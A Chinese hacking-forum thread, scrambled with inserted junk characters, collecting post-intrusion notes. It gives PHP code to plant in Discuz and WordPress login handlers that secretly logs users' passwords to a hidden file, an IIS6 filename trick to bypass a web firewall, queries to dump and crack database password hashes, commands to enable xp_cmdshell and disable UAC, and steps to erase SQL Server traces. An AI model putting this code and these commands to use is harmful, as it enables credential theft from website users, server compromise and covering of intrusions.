  M) E, |' F: d当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
- S- Z  W7 C7 n0 k4 T就是搜索case ‘login’
7 d5 H) g, r" f7 ~在它下面直接插入即可,记录的密码生成在pwd.txt中,
. G% Y, Z/ x. H3 J其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
1 P8 S$ p' B6 u! s8 S$ }  ^( E2 W利用II6文件解析漏洞绕过安全狗代码:5 K: a0 S; K% B+ l& A# w$ t
;antian365.asp;antian365.jpg( [* W+ g! Q9 [4 S8 L$ s
: p7 r$ R' ~% C! i* T$ t. ~. l8 m
各种类型数据库抓HASH破解最高权限密码!
; T. K- R# c; X. j0 ^- N1.sql server2000
# M! d" \/ P7 z% P  e# n/ \. JSELECT password from master.dbo.sysxlogins where name='sa'7 Z6 @1 j% e# T3 I8 P* a3 G0 X' G
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
; }1 r) ~0 J1 s$ g! ?2FD54D6119FFF04129A1D72E7C3194F7284A7F3A) L) n; o; b1 z3 W7 C  M+ @
1 |# k; Q5 h3 e# [+ C& m4 g/ E+ K
0×0100- constant header
, @9 @: i2 D" ]34767D5C- salt
- R& D- @4 m9 u7 b6 h0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash  Q6 p- s& K& c7 [1 k
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
( b- D* X, g; j9 T( y9 M* z8 Zcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash: L: g7 j8 @+ `% m" I- \2 g
SQL server 2005:-
6 [% ~' c6 F5 ?) ZSELECT password_hash FROM sys.sql_logins where name='sa'2 {3 D$ F. u! R! t* g7 h
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
8 {% x' C4 Q5 @, J0×0100- constant header
; L& b8 a: H! k. K9 Z$ g4 N993BF231-salt
: g- q% E  f' e2 N6 h, _5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
6 @" y- A6 g8 S" K+ H& ncrack case sensitive hash in cain, try brute force and dictionary based attacks.
" e) p) Q' Q& K2 d, Y" i' ~+ H9 z& W, `: J0 E
update:- following bernardo’s comments:-7 X$ u$ m! f1 p( h3 K
use function fn_varbintohexstr() to cast password in a hex string.
; k( x! k5 `  E! Y3 c. ~2 ee.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
0 j* H0 X% N5 o) P- l9 ?" y  j# p& [: h( }5 g: }
MYSQL:-
% H+ D8 j* R4 N$ M. ~9 a4 m& A
& Z3 N; R5 D3 sIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.& u6 e  \) H* E$ Z$ A: h; t

! z! f1 Q4 n. P" R9 K' M8 u* [% v9 x*mysql  < 4.1. l) t- \6 {3 m

5 `9 e2 H8 Q7 E+ x% J( ?mysql> SELECT PASSWORD(‘mypass’);
, T8 R( A! g. s, P+——————–+
& ^1 q& p$ s) p| PASSWORD(‘mypass’) |/ S6 A; `2 h! {6 k9 w' ]
+——————–+
3 g8 P) [2 O$ A! q% ?! Z7 o6 C4 \/ a| 6f8c114b58f2ce9e   |" E9 k- _9 f# b* C  q
+——————–+
1 u8 ]9 C/ H, |4 ^" o, r
  R6 q6 @! I- F4 \. z) j8 b*mysql >=4.1* P$ z: ~0 K' y: P) a; C5 Y! {5 y
& Y7 @, s3 }! T  J( @
mysql> SELECT PASSWORD(‘mypass’);$ l6 ^! ^; \# x  B
+——————————————-+3 G/ }+ h2 w& ^; }3 \8 v$ x; L0 K" o; Z
| PASSWORD(‘mypass’)                        |' v6 L7 x' {7 ^/ Y+ y
+——————————————-+
" l# ?) C3 l# l' d+ d| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
0 C( _: @% e2 Z5 I+ n+——————————————-+
8 O) p4 a1 }0 ~5 `
8 R8 |- X. z! O8 w1 I' l  p2 {Select user, password from mysql.user% I9 [& M0 C$ ?/ {
The hashes can be cracked in ‘cain and abel’8 {  Q3 K! x2 r4 e) p1 d

3 X! p8 C4 H  w; h; iPostgres:-
, R: A. l8 h) h& o, u9 h- zPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
0 I4 i- R0 b/ Cselect usename, passwd from pg_shadow;' O% S& `# s% f; ~) r
usename      |  passwd
1 i+ W! w5 I, B0 ^% d: k——————+————————————-
4 U, L( S* g$ @2 ?- o- [: T3 htestuser            | md5fabb6d7172aadfda4753bf0507ed4396" m# L2 A8 A- A) r5 l% ?) z0 w1 Q
use mdcrack to crack these hashes:-
& O4 C, O5 M3 d0 v0 V) Q$ L8 v$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
. M& v7 d6 r3 ?1 ?/ P' ^( ^# _* M% G+ f
Oracle:-
5 g. g- Y( |1 h  {# x$ I# F4 S" lselect name, password, spare4 from sys.user$' m- g, {$ h2 O% u* w: g3 d
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g, g" X& h$ I2 g/ q/ i7 [) [" X. T
More on Oracle later, i am a bit bored….4 ?4 u( q' P1 w" ?  r9 H& E; z  y
( A! ^$ s2 A) k3 M" A

' H3 H1 `  I- h* q- {! ]在sql server2005/2008中开启xp_cmdshell' ?( T" [7 ?) y& i; u1 n, H
-- To allow advanced options to be changed.# t1 c1 x1 n/ L  m1 {: p0 H
EXEC sp_configure 'show advanced options', 1
" u( P) E7 P! NGO3 j$ ]. y, g: G3 G5 I
-- To update the currently configured value for advanced options.
; \8 K$ v7 D4 m4 URECONFIGURE- ?1 G0 J# ]' @, H) t) w
GO" P/ P" z8 w- t4 z/ r# p
-- To enable the feature.  {6 |; x7 N. A* @" T4 H
EXEC sp_configure 'xp_cmdshell', 1% _# S3 f5 A* M* A- S+ c; n1 w! `
GO
: b5 C" E( Y8 t, r6 l% ^+ X-- To update the currently configured value for this feature.
- a* p7 L$ c( T% _6 S0 P/ NRECONFIGURE- T" n+ @! v: ?  i3 [* m2 w
GO
  Y  S( v! |# A) j4 iSQL 2008 server日志清除,在清楚前一定要备份。
5 u" r# |" n& f如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
0 s& D' P, E( wX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin4 [7 j. N: b/ q, B1 x& l

5 {- t' A2 l* k% V( z& S8 d对于SQL Server 2008以前的版本:1 L1 `& R5 f, H: ?3 d4 x  z- Y) ^% N
SQL Server 2005:4 y. |$ ~4 p& V3 Y2 A& V) K- X: `
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat4 j: A* I6 S: W. x0 E! J
SQL Server 2000:* s; Y# d7 `4 C3 r0 L( Q5 S% X
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。/ _, ?' m$ Y% K' E, S$ M
% Y4 J; g( |& y" N9 m: s
本帖最后由 simeon 于 2013-1-3 09:51 编辑
$ G2 `0 o0 {( d7 C4 j* t$ l' q; R

8 B1 T% b$ h& ywindows 2008 文件权限修改
( p/ i4 {$ N+ ]# s, c( \1 \0 M1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
# g3 [  x$ u  ?/ R9 V2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad989 }3 \9 N9 ~. B; |  B
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,* D: p4 Z" [. D( q8 D
1 t) Y, L5 s! P" V2 ^
Windows Registry Editor Version 5.00
2 h- _% W6 v" Q5 f. @) a[HKEY_CLASSES_ROOT\*\shell\runas]
( y  l; L2 O/ i6 q8 J2 F@="管理员取得所有权"
' t4 u& F( s9 p+ t& P1 {"NoWorkingDirectory"=""
5 E9 w8 ?2 a  C2 f[HKEY_CLASSES_ROOT\*\shell\runas\command]
; `( H! B# D- l! Q; ?@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
6 ?' x% ~5 N9 j/ i; ]$ r6 a"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 v, m1 j+ D% b. `
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
9 X3 O. G/ I$ _8 n1 x* |5 p: w; l@="管理员取得所有权"$ q" M& ?! m  }6 y5 Y, ]+ ~; o
"NoWorkingDirectory"=""  a7 H) u+ g3 w
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]( Q6 S% {' ^- n/ w9 H& a/ s7 K: z
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( e5 O( A! X% ?# T3 V# D/ h* Q"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 L4 g; d% H8 ~6 p4 C' l% @2 e4 h: m+ O& g; ?; d5 @
[HKEY_CLASSES_ROOT\Directory\shell\runas]
. [8 k' W+ l5 L9 X@="管理员取得所有权"
! u7 K2 R2 e6 n8 {% ["NoWorkingDirectory"=""/ a4 P! R% q  H; i- Q; j" I
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
& q: h( g( F" o: [; K$ R( S@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
* z# ~5 F+ \, d$ r+ n"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
1 u$ e7 n5 I, _4 X/ X2 C7 k, q! D
6 \3 _  \+ m% v
win7右键“管理员取得所有权”.reg导入5 z. e2 b, D5 y7 d
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,* u9 M; C' h0 Z
1、C:\Windows这个路径的“notepad.exe”不需要替换! b' ?/ b) n8 w) r
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
# o. V4 e7 _+ v0 ?' z3、四个“notepad.exe.mui”不要管
1 J' E  P; K( E3 O& g4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
. r6 V3 t1 s# h1 Y9 ]C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
3 |1 Z8 K% t  n1 r: L* G替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,* l3 o" _' I8 D0 l7 }9 g
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
  j. Q& b) J6 t* a/ g5 U2 bwindows 2008中关闭安全策略: . ~! i4 d' l2 W8 m% _+ {
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f! P/ ], n! W" t  Q4 e
修改uc_client目录下的client.php 在
, o/ u$ d9 I, {8 ^0 |4 \function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
) w7 Z! R+ p& C$ K# Q1 f下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
# [, y" N9 g5 C$ V) u- @你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw8 ~/ \6 o7 [8 J- S3 H
if(getenv('HTTP_CLIENT_IP')) {
" ^8 i8 C3 D6 ~9 h5 f$onlineip = getenv('HTTP_CLIENT_IP');
& N% M1 P; q; b9 o} elseif(getenv('HTTP_X_FORWARDED_FOR')) {3 O4 M9 {: m( |2 b' U; h3 j
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
& V) l4 ?1 d" \  X/ Q} elseif(getenv('REMOTE_ADDR')) {+ c/ P" g+ y  s( }4 W
$onlineip = getenv('REMOTE_ADDR');+ Y$ q( T- K: a& Y& R1 h
} else {! w8 E: V, D$ W' J6 l( ~1 `
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];* C3 l. P! ^. B/ R
}7 C+ w; c$ c$ h% }/ H  D/ Q1 y8 P
     $showtime=date("Y-m-d H:i:s");
+ L( ]- @5 B8 Y2 {* m( U6 r  r6 }( R2 v    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
! B& k5 q: c" n4 o1 }6 L  k    $handle=fopen('./data/cache/csslog.php','a+');
$ }/ r  |, D& ?' R    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表